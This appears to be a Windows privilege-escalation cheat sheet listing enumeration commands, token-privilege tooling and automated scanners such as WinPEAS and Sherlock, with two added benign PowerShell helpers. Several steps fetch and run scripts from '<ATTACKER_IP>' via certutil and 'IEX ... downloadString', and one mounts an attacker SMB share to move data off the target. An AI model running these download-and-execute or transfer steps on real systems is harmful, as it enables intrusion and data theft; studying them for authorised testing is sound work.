PRIMARY CATEGORY → WINDOWS PENTESTING

Components


Groups

Windows Privileged Groups


Privileges

Windows Privileges


Enabling disabled Privileges

GitHub Repository

EnableAllTokenPrivs.ps1

Setup
  • Download the PS Script

From the attacker ⚔️

curl --silent --location --request GET 'https://raw.githubusercontent.com/fashionproof/EnableAllTokenPrivs/master/EnableAllTokenPrivs.ps1' --remote-name
  • Transferring it to the target

From the attacker ⚔️

python3 -m http.server 80

From the target 🎯

mkdir C:\Windows\Temp\LPE
cd C:\Windows\Temp\LPE
certutil.exe -urlcache -split -f "http://<ATTACKER_IP>/EnableAllTokenPrivs.ps1"
  • Importing the PS Script/Module

From the Target 🎯

Import-Module .\EnableAllTokenPrivs.ps1
Usage
.\EnableAllTokenPrivs.ps1
Verifying the Current User Privileges
whoami /priv
Resources

Lee Holmes: Adjusting Token Privileges in PowerShell

Medium: Enable All Token Privileges


Manual Enumeration

Network
Network Interfaces, IP Addresses and DNS
ipconfig /all
ARP Table
arp -a
Routing Table
route print
TCP Ports

CMD

netstat -ano

PS

Get-NetTCPConnection -State Listen
Protections
Windows Defender Status
Get-MPComputerStatus
AppLocker Rules
Get-AppLockerPolicy -Effective | Select -ExpandProperty RuleCollections
  • Testing AppLocker Policy against a certain principal
Get-AppLockerPolicy -Local | Test-AppLockerPolicy -Path '<BINARY_PATH>' -User '<USER_OR_GROUP>'
Running Processes

CMD

tasklist /svc

PS

Get-Process

Get-Process

Get-CIMInstance

Get-CIMInstance -ClassName win32_process
TCP Port ↔ PID

CMD & PS

netstat -ano
  • Process name ↔ TCP Port

PS

Get-NetTCPConnection -State Listen | % { "$( (Get-Process -Id $_.OwningProcess).name ) → $( $_.LocalPort )" }
  • Process CMDLine ↔ TCP Port

PS

Get-NetTCPConnection -State Listen | % { "$( $_.LocalPort ) → $( (Get-CIMInstance -ClassName win32_process -Filter "ProcessId=$( $_.OwningProcess )" -Property * ).CommandLine )" }
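The two one-liners above produce strings; for an inventory of listening services (what is exposed, under which PID, started how) it is more useful to get one object per socket that can be sorted, filtered and exported. The function below is an added example, not part of the original notes or of any tool listed here. It assumes a Windows host with the NetTCPIP module (Get-NetTCPConnection) and treats a $null CommandLine as "not visible to this user" (SYSTEM services when not elevated), which is different from "no command line".

```powershell
# Added example (not from the original page): one object per listening TCP socket,
# joined to its owning process via a single CIM query instead of one query per socket.
# Assumption: Windows with Get-NetTCPConnection available.
function Get-ListeningPortOwner {
    [CmdletBinding()]
    param(
        # Restrict to a single port, e.g. -LocalPort 445; default is all listeners
        [int]$LocalPort
    )

    $listeners = Get-NetTCPConnection -State Listen
    if ($PSBoundParameters.ContainsKey('LocalPort')) {
        $listeners = $listeners | Where-Object LocalPort -eq $LocalPort
    }

    # Build a PID -> Win32_Process lookup once; keys cast to uint32 so both sides match
    $procById = @{}
    Get-CimInstance -ClassName Win32_Process |
        ForEach-Object { $procById[[uint32]$_.ProcessId] = $_ }

    foreach ($conn in $listeners) {
        $proc = $procById[[uint32]$conn.OwningProcess]
        [pscustomobject]@{
            LocalAddress   = $conn.LocalAddress
            LocalPort      = $conn.LocalPort
            PID            = $conn.OwningProcess
            # The process may have exited between the socket and the process query
            ProcessName    = $(if ($proc) { $proc.Name } else { '<exited>' })
            ExecutablePath = $(if ($proc) { $proc.ExecutablePath } else { $null })
            # $null CommandLine usually means access denied (e.g. SYSTEM service, non-admin caller)
            CommandLine    = $(if ($proc -and $proc.CommandLine) { $proc.CommandLine } else { '<not visible>' })
        }
    }
}

# Usage: all listeners sorted by port; pipe to Export-Csv to keep a baseline for later diffing
Get-ListeningPortOwner | Sort-Object LocalPort |
    Format-Table LocalPort, PID, ProcessName, CommandLine -AutoSize
```

Running it once elevated and once as a standard user shows which listeners are owned by processes the low-privileged account cannot inspect; a saved CSV from a known-good state makes new listeners stand out on a later run.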
Monitoring for new Processes

From the attacker ⚔️

python3 -m http.server 80

From the target 🎯

IEX (New-Object Net.WebClient).downloadString('http://<ATTACKER_IP>/Procmon.ps1')
Environment Variables

CMD

set

PS

dir env:
Detailed Information about the Host
systeminfo
Patches and Updates

CMD

QFE stands for Quick Fix Engineering

wmic qfe

PS

Get-HotFix | ft -AutoSize
Installed Software

CMD

wmic product get name

PS

Get-WMIObject -Class Win32_Product | Select Name, Version
Users, Groups and Computers
Logged-In Users
query user
Current User
whoami
echo %USERNAME%
Current User Information
whoami /all
net user %USERNAME%
Current User Privileges
whoami /priv
Current User Groups
whoami /groups
List Local System Users
net user
List Local System Groups
net localgroup
Listing information about a certain group
net localgroup "<GROUP>"
Local Password Policy
net accounts
Users’ Description

PS

Get-LocalUser
Computer Description

PS

Get-CIMInstance -ClassName win32_operatingsystem | Select -ExpandProperty Description
Checking if the current host is a domain-joined machine

CMD

echo %logonserver%
echo %userdnsdomain%
systeminfo | findstr /I "domain"

PS

Get-CIMInstance WIN32_ComputerSystem | Select Domain
Listing information about the available DCs
cmd.exe /c nltest.exe /dsgetdc:%userdnsdomain%
cmd.exe /c nltest.exe /dclist:%userdnsdomain%
Scheduled Tasks

CMD & PS

schtasks /query /fo LIST /v

PS

Get-ScheduledTask | select TaskName,State

Automated Enumeration

PowerUp

PowerUp.ps1

Seatbelt

Seatbelt

Precompiled Binaries

WinPEAS

WinPEAS

SharpUp

SharpUp

Precompiled Binaries

Sherlock

Sherlock

Missing Software Patches

Setup
  • Downloading the PowerShell Script

From the attacker ⚔️

curl --silent --location --request GET --remote-name 'https://github.com/rasta-mouse/Sherlock/raw/refs/heads/master/Sherlock.ps1'
  • Transferring it to the target

Fileless

From the attacker ⚔️

python3 -m http.server 80

From the target 🎯

IEX (New-Object Net.WebClient).downloadString('http://<ATTACKER_IP>/Sherlock.ps1')
Usage

Find-AllVulns

Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process
Find-AllVulns
Windows Exploit Suggester

Windows Exploit Suggester

Setup

Python 2.7 required

  • Setting up Python 2.7
curl https://pyenv.run | bash
export PYENV_ROOT="$HOME/.pyenv"
export PATH="$PYENV_ROOT/bin:$PATH"
eval "$(pyenv init -)"
pyenv install 2.7.18
  • Creating a Virtual Environment
pyenv shell 2.7.18 && pip install virtualenv
virtualenv .venv
. .venv/bin/activate
  • Downloading the Python Script

From the attacker ⚔️

curl --silent --location --request GET --remote-name 'https://github.com/strozfriedberg/Windows-Exploit-Suggester/raw/refs/heads/master/windows-exploit-suggester.py'
  • Gathering System Information

From the target 🎯

systeminfo > systeminfo.txt
  • Transferring the resource above to the attacker

Setting up an SMB Server

From the attacker ⚔️

smbserver.py -smb2support -user '<USER>' -password '<PASSWD>' '<SHARE>' '<LOCAL_PATH>'

Creating a Network Drive

From the target 🎯

net use X: "\\<ATTACKER_IP>\<SHARE>" /USER:<USER> <PASSWD>
  • Updating the Local Microsoft Vulnerability Database

From the attacker ⚔️

The command below generates an Excel File

python windows-exploit-suggester.py --update
  • Running the Tool
python windows-exploit-suggester.py --database '<XLS_FILE>' --systeminfo '<SYSTEMINFO_FILE>'
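What the suggester actually consumes from systeminfo.txt is the OS version/build line and the list of installed KB numbers. The parser below is an added example, not code from the original notes or from the Windows-Exploit-Suggester project; it extracts those fields so a captured file can be sanity-checked (right host, not stale) before running the tool. It assumes English systeminfo output, since the field labels are localized on non-English systems. The sample text is constructed, not captured from a real host.

```powershell
# Added example (not from the original page or from Windows-Exploit-Suggester):
# parse "systeminfo" text into hostname, OS name/version and the installed KB list.
# Assumption: English systeminfo output (labels such as "OS Version:" are localized otherwise).
function ConvertFrom-SystemInfo {
    param(
        # Raw systeminfo output, as one string or an array of lines
        [Parameter(Mandatory)][string[]]$Text
    )
    $lines  = $Text -split "`r?`n"
    $result = [ordered]@{ HostName = $null; OSName = $null; OSVersion = $null; Hotfixes = @() }

    foreach ($line in $lines) {
        switch -Regex ($line) {
            '^Host Name:\s+(.+?)\s*$'  { $result.HostName  = $Matches[1] }
            '^OS Name:\s+(.+?)\s*$'    { $result.OSName    = $Matches[1] }
            '^OS Version:\s+(.+?)\s*$' { $result.OSVersion = $Matches[1] }
            # Hotfixes are indented continuation lines under "Hotfix(s):", e.g. "[01]: KB5005033"
            '^\s+\[\d+\]:\s*(KB\d+)'   { $result.Hotfixes += $Matches[1] }
        }
    }
    [pscustomobject]$result
}

# Constructed sample (not a real host), trimmed to the lines the parser cares about
$sample = @'
Host Name:                 WS01
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19044 N/A Build 19044
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB5003791
                           [02]: KB5005033
                           [03]: KB5006670
Network Card(s):           1 NIC(s) Installed.
'@

$info = ConvertFrom-SystemInfo -Text $sample
$info

# On the host itself, KBs reported by Get-HotFix but absent from the file mean the capture
# is stale and the suggester will over-report missing patches:
# Compare-Object -ReferenceObject $info.Hotfixes -DifferenceObject (Get-HotFix).HotFixID
```

For the sample above the function returns HostName WS01, OSVersion "10.0.19044 N/A Build 19044" and three hotfixes; an empty Hotfixes array on real output is the usual sign of a non-English locale or of a file truncated before the "Hotfix(s):" block.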
LaZagne

LaZagne

Credential Hunting